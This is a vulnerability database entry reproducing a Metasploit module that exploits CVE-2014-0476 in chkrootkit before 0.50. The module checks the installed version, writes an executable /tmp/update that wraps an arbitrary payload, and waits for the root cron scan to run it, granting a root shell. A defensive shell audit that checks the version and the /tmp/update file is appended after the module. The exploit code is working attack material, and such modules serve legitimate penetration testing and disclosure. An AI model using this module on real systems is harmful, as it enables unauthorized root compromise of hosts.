
Chkrootkit Local Privilege Escalation

20 Nov 2015 00:00:00 | Reported by Thomas Stangner | Type: packetstorm | Source: packetstormsecurity.com | 42 Views

Chkrootkit Local Privilege Escalation, executes any file in /tmp/update as roo

Code
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Chkrootkit Local Privilege Escalation',
      'Description' => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privsec.

        WfsDelay is set to 24h, since this is how often a chkrootkit
        scan is scheduled by default.
      },
      'Author' => [
        'Thomas Stangner', # Original exploit
        'Julien "jvoisin" Voisin' # Metasploit module
      ],
      'References' => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'SessionTypes' => ['shell', 'meterpreter'],
      'Privileged' => true,
      'Stance' => Msf::Exploit::Stance::Passive,
      'Targets' => [['Automatic', {}]],
      'DefaultTarget' => 0,
      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end

end
```
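A host-side audit for the condition described above (a chkrootkit release before 0.50 plus an executable /tmp/update), added here as an example and not part of the original module. The function names are hypothetical, and the banner format is assumed to be the one the module's `check` method matches.

```shell
#!/bin/sh
# Added defensive audit; function names are hypothetical, not from the module.
# Assumes "chkrootkit -V" prints "chkrootkit version X.YY" (the banner the
# module's check method matches) and that releases use two-digit minors.
# Run as root so the -x test reflects what the root-run scan would see.

# Exit 0 if the banner shows a release before 0.50, 1 if not, 2 if unparseable.
is_vulnerable_version() {
    ver=$(printf '%s\n' "$1" |
        sed -n 's/.*chkrootkit version \([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p' |
        head -n 1)
    [ -n "$ver" ] || return 2
    set -- $ver                      # $1 = major, $2 = minor
    [ "$1" -eq 0 ] && [ "$2" -lt 50 ]
}

# Describe the file a vulnerable scan would run: absent, not-executable,
# or executable:uid=N (N is the numeric owner, useful for triage).
update_file_state() {
    path=${1:-/tmp/update}
    if [ ! -e "$path" ] && [ ! -L "$path" ]; then
        echo absent
    elif [ -f "$path" ] && [ -x "$path" ]; then
        echo "executable:uid=$(ls -ln "$path" | awk '{print $3}')"
    else
        echo not-executable
    fi
}

# Combine both signals into one finding line.
assess() {
    rc=0
    is_vulnerable_version "$1" || rc=$?
    state=$(update_file_state "$2")
    case "$rc:$state" in
        0:executable*) echo "ALERT: chkrootkit < 0.50 and $2 is $state" ;;
        0:*)           echo "WARN: chkrootkit < 0.50, upgrade ($2 is $state)" ;;
        1:*)           echo "OK: chkrootkit is not before 0.50 ($2 is $state)" ;;
        *)             echo "UNKNOWN: cannot parse version banner" ;;
    esac
}

# Run against this host; /usr/sbin/chkrootkit is the module's default path.
banner=$("${CHKROOTKIT:-/usr/sbin/chkrootkit}" -V 2>&1 || true)
assess "$banner" /tmp/update
```

Set `CHKROOTKIT` in the environment if the binary lives somewhere other than the module's default path.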

20 Nov 2015 00:00 (current) | Vulners AI Score: 0.9 (low risk) | EPSS: 0.11441